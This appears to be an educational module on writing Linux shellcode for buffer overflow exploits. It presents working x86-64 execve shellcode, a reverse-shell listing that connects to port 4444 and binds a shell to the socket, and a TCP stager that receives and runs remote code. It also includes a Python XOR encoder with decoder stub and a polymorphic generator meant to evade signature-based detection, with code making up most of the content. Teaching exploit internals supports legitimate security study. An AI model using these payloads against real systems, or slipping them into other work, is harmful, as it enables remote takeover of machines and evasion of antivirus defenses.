Buffer Overflow Attacks - Learning Module

Code Injection

The Art of Weaponized Bytes

In 1996, Aleph One's Phrack article "Smashing the Stack for Fun and Profit" popularized "shellcode", compact, self-contained machine code designed to spawn a command shell when executed. The name stuck: whether the payload downloads a file, establishes a network connection, or modifies system configuration, we still call it shellcode.

Code injection represents the culmination of a buffer overflow attack. Once an attacker controls the instruction pointer, they must provide something meaningful for the CPU to execute. Writing effective shellcode is a discipline that combines low-level assembly programming, deep understanding of OS internals, and creative problem-solving to work around constraints.

This page moves from exploitation as a concept to the payload itself: the bytes that make exploitation worthwhile.

What You Will Learn

By the end of this page, you will understand: how to write position-independent shellcode, system call mechanics for spawning shells and making network connections, encoding techniques to bypass character filters, polymorphic and metamorphic shellcode concepts, and the practical limitations of modern shellcode deployment.

Shellcode Fundamentals

Shellcode is machine code (raw CPU instructions) designed to execute arbitrary operations when injected into a running process. Unlike compiled programs, shellcode has unique constraints:

Position Independence: Shellcode doesn't know where in memory it will land. It cannot use absolute addresses for its own data or code. All references must be relative or computed at runtime.

Self-Containment: Shellcode typically cannot rely on external libraries being loaded at known addresses. It must make direct system calls or use carefully-located library functions.

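Size Minimization: The overflowed buffer bounds the payload, so a smaller buffer means tighter space constraints. Every byte counts when you're working within a 64-byte or 128-byte overflow window.

Character Restrictions: Many vulnerabilities involve string functions or input parsers that terminate on, alter, or filter certain bytes (for example, strcpy stops copying at the first null byte). Shellcode must avoid or encode those bytes.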

Common Shellcode Categories

•Local Shellcode — Executes on the same machine. Spawns a shell, reads files, or modifies system state. Used for local privilege escalation or post-exploitation.
•Bind Shell — Opens a listening port on the target machine. Attacker connects inbound. Problem: firewalls often block unexpected inbound connections.
•Reverse Shell — Initiates an outbound connection to the attacker's machine. Bypasses ingress firewall rules. Most common in real-world exploitation.
•Egghunter — Tiny first-stage shellcode that searches memory for a larger second-stage payload marked with a unique signature ('egg'). Used when exploit buffer is too small for full payload.
•Staged Payload — First stage is minimal (connect back, receive data); second stage is the full payload downloaded over the network. Metasploit's meterpreter uses this model.
•Fileless Execution — Loads code directly into memory without touching disk. Evades file-based antivirus detection.

Why 'Shell' Code?

The term 'shellcode' originated because early payloads primarily spawned interactive shells (/bin/sh on Unix). Today, shellcode might exfiltrate data, establish persistent backdoors, mine cryptocurrency, or deliver ransomware—but the name persists as a historical artifact of the exploit development community.

Writing Position-Independent Code

Position-independent code (PIC) executes correctly regardless of where it's loaded in memory. This is essential for shellcode because we can't predict the exact address where our payload will land.

The Problem: Shellcode often needs to reference strings (like /bin/sh) or other data. Normal code uses absolute addresses, but we don't know our address.

The Solution: Multiple techniques exist to create position-independent references:

PIC Techniques

•JMP-CALL-POP Technique — Jump forward over data, call backward to get address pushed on stack, pop that address into a register. Classic and reliable.
•Stack-Based String Building — Push string bytes onto stack, then reference via stack pointer. No absolute addresses needed.
•RIP-Relative Addressing (x86-64) — On 64-bit, use lea rax, [rip+offset] to get addresses relative to current instruction. Very clean on modern architectures.
•GetPC Techniques — Various tricks to get the current program counter (instruction pointer) value into a register, enabling relative calculations.

jmp_call_pop.asm

Assembly (x86-64)

;; JMP-CALL-POP Technique for position-independent string reference
;; This is the classic technique, works on all x86/x64
 
section .text
global _start
 
_start:
    jmp short get_string_addr    ; Jump forward over data access code
 
execute_shell:
    pop rdi                       ; Pop string address from stack
                                  ; (CALL pushed address of string)
    
    xor rsi, rsi                  ; argv = NULL
    xor rdx, rdx                  ; envp = NULL
    
    push 59                       ; syscall number for execve
    pop rax                       ; Avoid null bytes in mov rax, 59
    
    syscall                       ; Execute execve("/bin/sh", NULL, NULL)
 
get_string_addr:
    call execute_shell            ; CALL pushes address of next byte (the string)
    db "/bin/sh", 0               ; String data immediately after CALL
 
;; Assembled, this becomes:
;; eb 0c                    jmp short get_string_addr (+12 bytes)
;; 5f                       pop rdi
;; 48 31 f6                 xor rsi, rsi
;; 48 31 d2                 xor rdx, rdx  
;; 6a 3b                    push 59
;; 58                       pop rax
;; 0f 05                    syscall
;; e8 ef ff ff ff           call execute_shell (-17 bytes)
;; 2f 62 69 6e 2f 73 68 00  "/bin/sh\0" (note: the terminator is itself a null byte)
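
The displacement bytes of the JMP and CALL in this listing follow directly from the instruction lengths: a relative branch encodes the target address minus the address of the instruction after the branch. The sketch below recomputes both values. The helper names (`offsets`, `displacement`) and the `LAYOUT` table are illustrative, and the instruction lengths assume the usual x86-64 encodings of these mnemonics.

```python
# Instruction lengths in bytes, in listing order (assumed x86-64 encodings).
LAYOUT = [
    ("jmp short get_string_addr", 2),
    ("pop rdi", 1),
    ("xor rsi, rsi", 3),
    ("xor rdx, rdx", 3),
    ("push 59", 2),
    ("pop rax", 1),
    ("syscall", 2),
    ("call execute_shell", 5),
]


def offsets(layout):
    """Return {mnemonic: (start_offset, end_offset)} for each instruction."""
    table, pos = {}, 0
    for name, size in layout:
        table[name] = (pos, pos + size)
        pos += size
    return table


def displacement(branch_end, target, width):
    """Encode target minus the address of the next instruction, little-endian."""
    return (target - branch_end).to_bytes(width, "little", signed=True)


table = offsets(LAYOUT)
execute_shell = table["pop rdi"][0]                # label execute_shell
get_string_addr = table["call execute_shell"][0]   # label get_string_addr

jmp_disp = displacement(table["jmp short get_string_addr"][1], get_string_addr, 1)
call_disp = displacement(table["call execute_shell"][1], execute_shell, 4)

print("jmp short:", (b"\xeb" + jmp_disp).hex())
print("call:     ", (b"\xe8" + call_disp).hex())
```

The forward jump skips 12 bytes and the call reaches back 17 bytes, so neither displacement depends on where the code is loaded.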

stack_string.asm

Assembly (x86-64)

;; Stack-based string building (no JMP-CALL needed)
;; Push string onto stack, reference via RSP
 
section .text
global _start
 
_start:
    xor rsi, rsi                  ; RSI = 0 (also serves as null terminator)
    push rsi                      ; Push null terminator onto stack
    
    ; Push "/bin//sh" (8 bytes, padded to avoid partial push)
    ; In little-endian: 0x68732f2f6e69622f
    mov rdi, 0x68732f2f6e69622f   ; "/bin//sh" 
    push rdi                      ; Push string onto stack
    
    mov rdi, rsp                  ; RDI = pointer to string on stack
    
    ; RSI already 0 (argv = NULL)
    xor rdx, rdx                  ; envp = NULL
    
    push 59
    pop rax                       ; Syscall number (execve = 59)
    
    syscall
 
;; Key insight: The string "/bin//sh" is built on the stack
;; The kernel's path resolution collapses the double slash, and it gives us exactly 8 bytes
;; No null bytes except the terminator pushed as 0

Why Double Slashes?

Using '/bin//sh' instead of '/bin/sh' gives exactly 8 bytes—a convenient size for 64-bit register operations. Unix systems treat consecutive slashes as a single slash, so '/bin//sh' is equivalent to '/bin/sh'. This trick is ubiquitous in shellcode development.
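
As a quick check of the arithmetic, the following sketch packs both spellings of the path into a 64-bit little-endian immediate. It only inspects bytes; the variable names are illustrative.

```python
import struct

padded = b"/bin//sh"                      # 8 bytes, no padding needed
plain = b"/bin/sh".ljust(8, b"\x00")      # 7 bytes plus one null pad byte

# A 64-bit immediate is stored little-endian, so the first character
# of the string ends up in the least significant byte.
(imm_padded,) = struct.unpack("<Q", padded)
(imm_plain,) = struct.unpack("<Q", plain)

print(hex(imm_padded))                    # immediate used by the mov rdi instruction
print(hex(imm_plain))                     # same idea, but with a null byte on top
print("null byte in /bin//sh:", 0 in padded)
print("null byte in padded /bin/sh:", 0 in plain)
```

The seven-byte spelling forces a 0x00 into the immediate, which is exactly the byte that string-based overflows cannot carry.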

System Call Mechanics

Shellcode operates in user space but needs kernel services—spawning processes, opening network connections, reading files. On Linux, this is accomplished through system calls (syscalls).

System Call Invocation on Linux x86-64:

Place syscall number in RAX
Place arguments in RDI, RSI, RDX, R10, R8, R9 (in order)
Execute the syscall instruction
Return value appears in RAX (the syscall instruction also overwrites RCX and R11)

Essential System Calls for Shellcode
Syscall	Number (x64)	Arguments	Purpose
`execve`	59 (0x3b)	rdi=path, rsi=argv, rdx=envp	Execute a program (spawn shell)
`read`	0	rdi=fd, rsi=buf, rdx=count	Read from file descriptor
`write`	1	rdi=fd, rsi=buf, rdx=count	Write to file descriptor
`open`	2	rdi=path, rsi=flags, rdx=mode	Open a file
`socket`	41	rdi=domain, rsi=type, rdx=proto	Create network socket
`connect`	42	rdi=sockfd, rsi=addr, rdx=len	Connect to remote host
`dup2`	33	rdi=oldfd, rsi=newfd	Duplicate file descriptor
`mprotect`	10	rdi=addr, rsi=len, rdx=prot	Change memory permissions
`fork`	57	(none)	Create child process
`exit`	60	rdi=status	Terminate process cleanly
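
The calling convention and the table above can be summarized as a small lookup. This is a sketch for reasoning about register setup, not something that issues system calls; `register_setup` and the two constants are hypothetical names introduced here.

```python
# Argument registers for the Linux x86-64 syscall convention, in order.
ARG_REGISTERS = ("rdi", "rsi", "rdx", "r10", "r8", "r9")

# Syscall numbers taken from the table above (x86-64 only).
SYSCALL_NUMBERS = {
    "read": 0, "write": 1, "open": 2, "mprotect": 10, "dup2": 33,
    "socket": 41, "connect": 42, "fork": 57, "execve": 59, "exit": 60,
}


def register_setup(name, *args):
    """Return the register values that must be in place before `syscall`."""
    if len(args) > len(ARG_REGISTERS):
        raise ValueError("at most six arguments fit in registers")
    registers = {"rax": SYSCALL_NUMBERS[name]}
    registers.update(zip(ARG_REGISTERS, args))
    return registers


# socket(AF_INET=2, SOCK_STREAM=1, 0)
print(register_setup("socket", 2, 1, 0))
# exit(0)
print(register_setup("exit", 0))
```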

reverse_shell.asm

Assembly (x86-64)

;; Reverse Shell Shellcode for Linux x86-64
;; Connects back to 127.0.0.1:4444 and spawns /bin/sh
;; Attacker runs: nc -lvp 4444
 
section .text
global _start
 
_start:
    ;; Create socket: socket(AF_INET=2, SOCK_STREAM=1, 0)
    xor rdi, rdi
    push rdi                      ; Push 0 for socket()
    pop rsi                       ; RSI = 0
    inc rsi                       ; RSI = 1 (SOCK_STREAM)
    push 2
    pop rdi                       ; RDI = 2 (AF_INET)
    xor rdx, rdx                  ; RDX = 0 (protocol)
    push 41
    pop rax                       ; syscall 41 = socket
    syscall
    
    mov r12, rax                  ; Save socket fd in R12
    
    ;; Build sockaddr_in structure on stack
    ;; struct sockaddr_in { sin_family=2, sin_port=0x5c11 (4444), sin_addr=127.0.0.1 }
    xor rax, rax
    push rax                      ; sin_zero padding
    
    mov eax, 0x0100007f           ; 127.0.0.1 in network byte order
    push rax                      ; sin_addr
    
    push word 0x5c11              ; port 4444 in network byte order
    push word 2                   ; AF_INET
    
    mov rsi, rsp                  ; RSI = pointer to sockaddr_in
    
    ;; Connect: connect(sockfd, &sockaddr, 16)
    mov rdi, r12                  ; Socket fd
    push 16
    pop rdx                       ; Address length
    push 42
    pop rax                       ; syscall 42 = connect
    syscall
    
    ;; Duplicate socket to stdin/stdout/stderr
    ;; dup2(sockfd, 0), dup2(sockfd, 1), dup2(sockfd, 2)
    mov rdi, r12                  ; Socket fd
    xor rsi, rsi                  ; Start with fd 0 (stdin)
    
dup_loop:
    push 33
    pop rax                       ; syscall 33 = dup2
    syscall
    inc rsi
    cmp rsi, 3
    jne dup_loop
    
    ;; Execute shell: execve("/bin/sh", NULL, NULL)
    xor rsi, rsi
    push rsi                      ; NULL terminator
    mov rdi, 0x68732f2f6e69622f   ; "/bin//sh"
    push rdi
    mov rdi, rsp                  ; RDI = pointer to string
    xor rdx, rdx                  ; envp = NULL
    push 59
    pop rax                       ; syscall 59 = execve
    syscall
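
The constants 0x5c11 and 0x0100007f in the listing look reversed because the port and address are stored in network (big-endian) byte order but loaded by a little-endian CPU. The sketch below builds the same 16-byte sockaddr_in with Python's standard library and reads the fields back the way x86 would; `sockaddr_in` is an illustrative helper, not part of any library.

```python
import socket
import struct


def sockaddr_in(ip, port):
    """Lay out a 16-byte IPv4 sockaddr_in as it appears in memory on x86."""
    family = struct.pack("<H", int(socket.AF_INET))  # host order (little-endian)
    port_be = struct.pack(">H", port)                # network order (big-endian)
    addr_be = socket.inet_aton(ip)                   # 4 bytes, network order
    return family + port_be + addr_be + bytes(8)     # sin_zero padding


raw = sockaddr_in("127.0.0.1", 4444)
print(raw.hex())

# Reading the big-endian fields as little-endian integers gives the
# constants that appear in the assembly listing.
(port_word,) = struct.unpack("<H", raw[2:4])
(addr_dword,) = struct.unpack("<I", raw[4:8])
print(hex(port_word), hex(addr_dword))
```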

32-bit vs 64-bit Syscalls

On 32-bit Linux, syscalls use int 0x80 with the syscall number in EAX and arguments in EBX, ECX, EDX, ESI, EDI, EBP. On 64-bit, the syscall instruction is used with the syscall number in RAX and arguments in RDI, RSI, RDX, R10, R8, R9. Syscall numbers also differ between 32-bit and 64-bit: execve is 11 on 32-bit x86 but 59 on x86-64. Always use the correct syscall table for your target architecture.

Avoiding Bad Characters

Bad characters are bytes that the vulnerability context corrupts, terminates, or filters. Common bad characters include:

\x00 (NULL) — Terminates strings in C
\x0a (newline) — Terminates input for fgets, line-based protocols
\x0d (carriage return) — Terminates input in some contexts
\x20 (space) — May be treated as delimiter
\x09 (tab) — May be treated as whitespace
\xff — Sometimes filtered by UTF-8 validation

The specific bad characters depend on the vulnerability and input handling.

Finding Bad Characters

•Send full byte range (0x00-0xff) as test payload
•Compare received/stored data with original
•Missing or altered bytes are bad chars
•Tools: mona.py, BadChars generator
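
The comparison procedure above can be sketched in a few lines. Because a single bad byte can truncate or shift everything after it, the sketch removes one culprit per round and resends. `simulated_target` is a stand-in written for this example (it truncates at NUL and strips CR/LF); in practice the "received" bytes would come from inspecting the target's memory in a debugger.

```python
def first_bad_char(sent, received):
    """Return the first sent byte that did not arrive intact, or None."""
    for i, byte in enumerate(sent):
        if i >= len(received) or received[i] != byte:
            return byte
    return None


def simulated_target(data):
    """Hypothetical input handler: stops at NUL, strips newline and CR."""
    data = data.split(b"\x00", 1)[0]
    return data.replace(b"\x0a", b"").replace(b"\x0d", b"")


def enumerate_bad_chars(target):
    """Repeatedly send the remaining byte range, dropping one bad byte per round."""
    candidates = bytearray(range(256))
    bad = []
    while True:
        sent = bytes(candidates)
        culprit = first_bad_char(sent, target(sent))
        if culprit is None:
            return bad
        bad.append(culprit)
        candidates.remove(culprit)


found = enumerate_bad_chars(simulated_target)
print([f"0x{b:02x}" for b in found])
```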

Avoidance Strategies

•XOR encoding with single-byte key
•Multi-byte XOR for stronger encoding
•Alphanumeric shellcode (A-Z, a-z, 0-9 only)
•Unicode-safe encoding for wide-char contexts

xor_encoder.py
Python
#!/usr/bin/env python3
"""
XOR Encoder for Shellcode
Encodes shellcode to avoid specified bad characters
Prepends a decoder stub that runs first and decodes the payload
"""
 
def find_xor_key(shellcode: bytes, bad_chars: bytes) -> int:
    """Find an XOR key that, when applied, produces no bad characters."""
    for key in range(1, 256):  # Skip 0 as XOR with 0 is no-op
        encoded = bytes([b ^ key for b in shellcode])
        if not any(c in bad_chars for c in encoded):
            # Also verify the key itself isn't a bad char (appears in decoder)
            if key not in bad_chars:
                return key
    raise ValueError("No valid XOR key found - try multi-byte encoding")
 
def xor_encode(shellcode: bytes, key: int) -> bytes:
    """XOR encode shellcode with given key."""
    return bytes([b ^ key for b in shellcode])
 
def generate_decoder_stub(key: int, length: int) -> bytes:
    """
    Generate x86-64 decoder stub.
    This stub XOR-decodes the following payload in-place, so the payload
    must sit in memory that is both writable and executable.
    """
    if not 1 <= length <= 255:
        raise ValueError("length must fit in CL (1-255 bytes)")
    # Decoder stub that decodes payload after itself
    # Uses JMP-CALL-POP to get address of encoded payload
    # Numbers before each comment are byte offsets from the start of the stub
    decoder = bytes([
        0xeb, 0x0f,                    # 0:  jmp short get_payload_addr (+15 -> 17)
        # decode_loop:
        0x5e,                          # 2:  pop rsi (address of encoded shellcode)
        0x31, 0xc9,                    # 3:  xor ecx, ecx
        0xb1, length,                  # 5:  mov cl, length
        # decode:
        0x80, 0x36, key,               # 7:  xor byte [rsi], key
        0x48, 0xff, 0xc6,              # 10: inc rsi (a bare 0x46 is a REX prefix in 64-bit mode)
        0xe2, 0xf8,                    # 13: loop decode (-8 -> 7)
        0xeb, 0x05,                    # 15: jmp short shellcode (+5 -> 22)
        # get_payload_addr:
        0xe8, 0xec, 0xff, 0xff, 0xff,  # 17: call decode_loop (-20 -> 2)
        # Encoded shellcode follows here, at offset 22
    ])
    return decoder
 
# Example usage
original_shellcode = bytes([
    0x48, 0x31, 0xf6,              # xor rsi, rsi
    0x56,                          # push rsi (null terminator for the string)
    0x48, 0xbf, 0x2f, 0x62, 0x69,  # mov rdi, '/bin//sh'
    0x6e, 0x2f, 0x2f, 0x73, 0x68,
    0x57,                          # push rdi
    0x48, 0x89, 0xe7,              # mov rdi, rsp
    0x48, 0x31, 0xd2,              # xor rdx, rdx
    0x6a, 0x3b,                    # push 59
    0x58,                          # pop rax (sets all of RAX, unlike mov al, 59)
    0x0f, 0x05                     # syscall
])
 
bad_chars = b"\x00\x0a\x0d"
 
print(f"Original shellcode: {len(original_shellcode)} bytes")
print(f"Bad characters to avoid: {bad_chars.hex()}")
 
# Find suitable key
key = find_xor_key(original_shellcode, bad_chars)
print(f"XOR key found: 0x{key:02x}")
 
# Encode
encoded = xor_encode(original_shellcode, key)
print(f"Encoded shellcode: {encoded.hex()}")
 
# Verify no bad chars
for c in encoded:
    if bytes([c]) in bad_chars:
        print(f"ERROR: Bad char 0x{c:02x} in encoded shellcode!")
        break
else:
    print("✓ No bad characters in encoded payload")
 
# Generate complete payload with decoder
decoder = generate_decoder_stub(key, len(original_shellcode))
final_payload = decoder + encoded
print(f"Final payload: {len(final_payload)} bytes")
print(f"Payload hex: {final_payload.hex()}")

Self-Decoding Payloads

XOR-encoded shellcode works by prepending a small decoder stub. When execution reaches the payload, the decoder runs first, XORing each byte with the key to reveal the original shellcode, then jumps to execute it. The decoder itself must be null-free and avoid bad characters—this constrains decoder design.
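
The reason a one-byte XOR works as both encoder and decoder is that XOR is its own inverse. The sketch below models the decoder loop on a Python bytearray, with variables named after the registers the stub uses, and also shows why the key must be chosen per payload: any payload byte equal to the key encodes to 0x00. The sample bytes and function names are illustrative.

```python
def xor_bytes(data, key):
    """Apply a single-byte XOR to every byte of data."""
    return bytes(b ^ key for b in data)


def simulate_decoder(encoded, key):
    """Model of the in-place decode loop: xor [rsi], key; inc rsi; loop."""
    buf = bytearray(encoded)
    rsi, rcx = 0, len(buf)          # pointer and counter, as in the stub
    while rcx:
        buf[rsi] ^= key
        rsi += 1
        rcx -= 1
    return bytes(buf)


sample = bytes.fromhex("4831f60f05")   # arbitrary sample bytes

# Round trip: decoding the encoded bytes restores the original.
restored = simulate_decoder(xor_bytes(sample, 0x41), 0x41)
print(restored == sample)

# A key that equals some payload byte produces a null byte when encoding.
print(xor_bytes(sample, 0x48).hex())
```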

Alphanumeric and Polymorphic Shellcode

Some vulnerability contexts are extremely restrictive, allowing only alphanumeric characters (A-Z, a-z, 0-9) or even narrower byte ranges. Additionally, signature-based detection systems may block known shellcode patterns. Advanced techniques address both challenges.

Alphanumeric Shellcode

•Constraint: Only bytes 0x30-0x39 (0-9), 0x41-0x5A (A-Z), 0x61-0x7A (a-z) allowed
•Challenge: Most essential instructions (syscall, int 0x80, mov, call, ret) use non-alphanumeric bytes; some short conditional jumps (opcodes 0x70-0x7A) are the exception
•Solution: Use the limited valid instructions to build a decoder that can generate arbitrary bytes
•Techniques: XOR with alphanumeric values, push/pop combinations, arithmetic operations
•Tools: alpha2, msfvenom's alpha_mixed encoder, ALPHA3

alphanumeric_concept.asm

Assembly Concepts

;; Alphanumeric-compatible instructions (32-bit x86)
;; These opcodes fall within A-Z, a-z, 0-9 ASCII ranges
 
;; Valid alphanumeric instructions include:
;; push/pop certain registers: P (0x50) = push eax, X (0x58) = pop eax
;; inc/dec: I = dec ecx (0x49), A = inc ecx (0x41), etc.
;; xor reg,imm: 5 = xor eax,imm32 (0x35)
;; Printable but NOT alphanumeric: % = and eax,imm32 (0x25)
 
;; Example: loading a chosen value into EAX using printable opcodes
;; Approach: AND with two masks whose bitwise AND is 0, then XOR in the value
;; Note: '%' (0x25) and '*' (0x2a) are printable ASCII but not alphanumeric, so this
;; zeroing idiom fits printable-ASCII filters; strict alphanumeric encoders zero registers another way
 
push eax                    ; P (0x50) - valid
and eax, 0x554e4d4a        ; %JMNU (immediate bytes 4a 4d 4e 55 in memory order)
and eax, 0x2a313235        ; %521* (0x554e4d4a AND 0x2a313235 = 0, so EAX = 0)
xor eax, 0x39443143        ; 5C1D9 (EAX = 0x39443143)
;; XOR with alphanumeric immediates only yields bytes below 0x80.
;; Bytes with the high bit set (e.g. cd 80 for int 0x80) need an extra step,
;; for example DEC EAX from zero (0x48, 'H') to get 0xffffffff before XORing
 
;; After building decoder in alphanumeric ops, decode and run real shellcode
 
;; Tools like alpha2 automatically generate these sequences
;; Example: msfvenom -p linux/x86/shell_reverse_tcp ... -e x86/alpha_mixed
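
The byte-level claims in this listing are easy to check mechanically. The sketch below tests which immediates are strictly alphanumeric, confirms that the two AND masks cancel, and shows that XORing alphanumeric bytes can never set the high bit. `is_alnum` and `imm32` are helper names introduced for this example.

```python
import string
import struct

ALNUM = set((string.ascii_letters + string.digits).encode())


def is_alnum(data):
    """True if every byte is in A-Z, a-z, 0-9."""
    return all(b in ALNUM for b in data)


def imm32(value):
    """Bytes of a 32-bit immediate as they appear in the instruction stream."""
    return struct.pack("<I", value)


mask_a, mask_b, value = 0x554E4D4A, 0x2A313235, 0x39443143

print(imm32(mask_a), is_alnum(imm32(mask_a)))   # JMNU: alphanumeric
print(imm32(mask_b), is_alnum(imm32(mask_b)))   # 521*: '*' is not alphanumeric
print(imm32(value), is_alnum(imm32(value)))     # C1D9: alphanumeric
print("AND opcode 0x25 alphanumeric:", is_alnum(b"\x25"))
print("masks cancel:", mask_a & mask_b == 0)

# Every alphanumeric byte is below 0x80, so XORing two of them is too.
high_bit_reachable = any((a ^ b) >= 0x80 for a in ALNUM for b in ALNUM)
print("XOR of alphanumeric bytes can set the high bit:", high_bit_reachable)
```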

Polymorphic Shellcode

Polymorphic shellcode changes its appearance on each generation while maintaining identical functionality. This defeats signature-based detection that looks for specific byte patterns.

How Polymorphism Works:

Variable encoding keys: Each instance uses a different XOR key, completely changing all encoded bytes
Decoder variation: The decoder stub itself uses different but equivalent instructions
NOP substitution: Different single-byte NOPs or multi-byte NOP equivalents
Register shuffling: Use different registers for the same operations
Junk insertion: Add non-functional instructions that change signature but don't affect execution

polymorphic_generator.py
Python
#!/usr/bin/env python3
"""
Simple Polymorphic Shellcode Generator
Generates unique encoded variants of base shellcode
"""
 
import random
 
def generate_polymorphic_variant(shellcode: bytes) -> bytes:
    """Generate a unique polymorphic variant of shellcode."""
    
    # Random XOR key (avoid 0x00)
    key = random.randint(1, 255)
    
    # Encode shellcode
    encoded = bytes([b ^ key for b in shellcode])
    
    # Generate decoder with random variations
    decoder = generate_varied_decoder(key, len(shellcode))
    
    # Add random NOP sled variation
    nop_variants = [
        b"\x90",              # NOP
        b"\x40\x48",         # inc eax; dec eax (null operation pair)
        b"\x87\xc0",         # xchg eax, eax
        b"\x86\xc9",         # xchg cl, cl  
    ]
    
    nop_sled = b""
    for _ in range(random.randint(8, 32)):
        nop_sled += random.choice(nop_variants)
    
    return nop_sled + decoder + encoded
 
def generate_varied_decoder(key: int, length: int) -> bytes:
    """Generate a 32-bit x86 decoder with random instruction choices."""
    if not 1 <= length <= 255:
        raise ValueError("length must fit in an 8-bit counter (1-255)")
    
    # Choose random register for loop counter (CL or BL)
    use_cl = random.choice([True, False])
    
    if use_cl:
        # Version using CL
        set_counter = bytes([0x31, 0xc9, 0xb1, length])  # xor ecx,ecx; mov cl,len
        loop_inst = bytes([0xe2])                        # loop rel8
    else:
        # Version using BL (LOOP only counts in ECX, so use dec/jnz instead)
        set_counter = bytes([0x31, 0xdb, 0xb3, length])  # xor ebx,ebx; mov bl,len
        loop_inst = bytes([0xfe, 0xcb, 0x75])            # dec bl; jnz rel8
    
    # Random junk instructions to insert (no-ops that change signature)
    junk_options = [
        b"",                   # No junk
        b"\x50\x58",         # push eax; pop eax
        b"\x51\x59",         # push ecx; pop ecx
        b"\x90",              # nop
    ]
    junk = random.choice(junk_options)
    
    xor_step = bytes([0x80, 0x36, key, 0x46])  # xor byte [esi], key; inc esi
    
    # Displacements are computed from the actual instruction lengths,
    # because the BL variant and the junk both change the layout
    loop_disp = (-(len(xor_step) + len(loop_inst) + 1)) & 0xff
    body = (
        junk
        + bytes([0x5e])                   # pop esi (address of encoded payload)
        + set_counter
        + xor_step
        + loop_inst + bytes([loop_disp])  # branch back to xor_step
        + bytes([0xeb, 0x05])             # jmp short over the call, into the payload
    )
    call_disp = (-(len(body) + 5)).to_bytes(4, "little", signed=True)
    
    # jmp short to the call; the call pushes the payload address and returns to junk/pop esi
    return bytes([0xeb, len(body)]) + body + bytes([0xe8]) + call_disp
 
# Generate multiple unique variants of same shellcode
base_shellcode = bytes([
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68,
    0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x50,
    0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80
])
 
print("Generating 3 polymorphic variants:")
for i in range(3):
    variant = generate_polymorphic_variant(base_shellcode)
    print(f"\nVariant {i+1}: {len(variant)} bytes")
    print(f"  First 20 bytes: {variant[:20].hex()}")
    print(f"  Hash: {hash(variant) & 0xffffffff:08x}")

Metamorphic Shellcode

Beyond polymorphism lies metamorphic code, which rewrites its own logic (not just its encoding) to generate functionally equivalent but structurally different variants. True metamorphic engines are complex, but because no constant decoder stub or fixed instruction sequence remains, they can evade static signature matching even when the code is examined in decoded form. Runtime behavior is unchanged, so behavior-based detection still applies.

Staged and Modular Payloads

Real-world exploitation often faces severe size constraints. A buffer might only hold 80 bytes—far too small for sophisticated payloads like Meterpreter. Staged payloads solve this by splitting the attack into multiple phases.

Staged Payload Architecture

•Stager (Stage 1) — Minimal code that establishes communication and receives the main payload. Examples: reverse_tcp, bind_tcp, and find_sock stagers. Sizes vary with architecture and transport, but stagers are typically far smaller than the payloads they fetch.
•Payload (Stage 2) — The full-featured payload delivered after stager connects. Can be arbitrarily large since it's transmitted over network/socket.
•Egghunter Variant — When second stage is already in memory (e.g., larger buffer elsewhere), stager searches for signature ('egg') and jumps to it.

stager.asm

Assembly (x86-64)

;; Minimal TCP Stager (reverse connect, receive, execute)
;; Assembles to roughly 100 bytes (not null-free as written)
;; Connects to attacker, receives arbitrary code, executes it
 
section .text
global _start
 
_start:
    ;; socket(AF_INET=2, SOCK_STREAM=1, 0)
    push 41                       ; syscall: socket
    pop rax
    push 2
    pop rdi                       ; AF_INET
    push 1
    pop rsi                       ; SOCK_STREAM
    xor rdx, rdx                  ; 0
    syscall
    mov r12, rax                  ; Save socket fd
 
    ;; Build sockaddr_in and connect
    push rdx                      ; 0 padding
    mov eax, 0x0100007f           ; 127.0.0.1
    push rax
    push word 0x5c11              ; Port 4444
    push word 2                   ; AF_INET
    
    push 42                       ; syscall: connect
    pop rax
    mov rdi, r12                  ; socket fd
    mov rsi, rsp                  ; sockaddr pointer
    push 16
    pop rdx                       ; addrlen
    syscall
 
    ;; mmap executable memory for payload
    push 9                        ; syscall: mmap
    pop rax
    xor rdi, rdi                  ; addr = NULL
    push 4096
    pop rsi                       ; length
    push 7                        ; PROT_READ|WRITE|EXEC
    pop rdx
    push 0x22                     ; MAP_ANONYMOUS|PRIVATE
    pop r10
    push -1                       ; sign-extended to 0xffffffffffffffff
    pop r8                        ; fd = -1
    xor r9, r9                    ; offset = 0
    syscall
    mov r13, rax                  ; Save mmap address
 
    ;; read(socket, mmap_addr, 4096)
    xor rax, rax                  ; syscall: read
    mov rdi, r12                  ; socket fd
    mov rsi, r13                  ; buffer (mmap)
    push 4096
    pop rdx                       ; count
    syscall
 
    ;; Jump to received payload
    jmp r13

Egghunter Technique

When you can inject a large payload into memory but only control a small buffer for the initial exploit, an egghunter bridges the gap:

Inject large payload into some reachable memory (heap, environment, etc.)
Prefix payload with unique 8-byte signature (the "egg"), typically a 4-byte tag repeated twice: e.g., w00tw00t
Small egghunter shellcode in exploited buffer searches memory for egg
When found, jump to address immediately after egg

Egghunters must handle:

Invalid memory pages (probe each address with a syscall such as access(), which returns EFAULT for unmapped memory instead of crashing)
Searching in correct direction
Finding the actual payload, not the egg reference in the egghunter itself (hence doubled egg signature)
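
The doubled-signature rule can be illustrated on a flat byte buffer. This sketch only models the search logic: the buffer stands in for process memory, `find_payload` is a hypothetical helper, and a real egghunter additionally has to probe pages for validity as described above.

```python
def find_payload(memory, tag=b"w00t"):
    """Return the offset just past the doubled tag, or -1 if it is absent."""
    egg = tag * 2
    index = memory.find(egg)
    return -1 if index < 0 else index + len(egg)


# The hunter itself contains one copy of the tag (as its search constant),
# so a search for the single tag would stop on the hunter, not the payload.
hunter = b"\x90" * 16 + b"w00t"
filler = b"\x90" * 32
memory = hunter + filler + b"w00tw00t" + b"PAYLOAD"

single_hit = memory.find(b"w00t")
payload_at = find_payload(memory)

print("single tag first matches at:", single_hit)   # inside the hunter
print("payload starts at:", payload_at)
print(memory[payload_at:])
```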

Metasploit Framework

Metasploit's payload system exemplifies staged architecture. Payloads like linux/x64/meterpreter/reverse_tcp are staged (small stager + full Meterpreter), while linux/x64/meterpreter_reverse_tcp is stageless (single large payload). Choose based on buffer size and operational requirements.

Modern Shellcode Challenges

Modern operating systems and hardware have deployed multiple layers of defense that complicate shellcode execution. Understanding these challenges is essential for both offensive research and defensive awareness.

Defenses Against Code Injection
Defense	Mechanism	Impact on Shellcode	Bypass Technique
DEP/NX	Data pages marked non-executable	Injected shellcode cannot run	ROP chains, ret2libc, calling mprotect
ASLR	Randomize library/stack addresses	Cannot predict where to return	Info leak, partial overwrite, brute force
Stack Canaries	Secret value before return address	Overflow detected before RET	Info leak canary, format string
CFI	Control flow integrity checks	Invalid jump targets blocked	CFI-compliant gadgets, fine-grained attacks
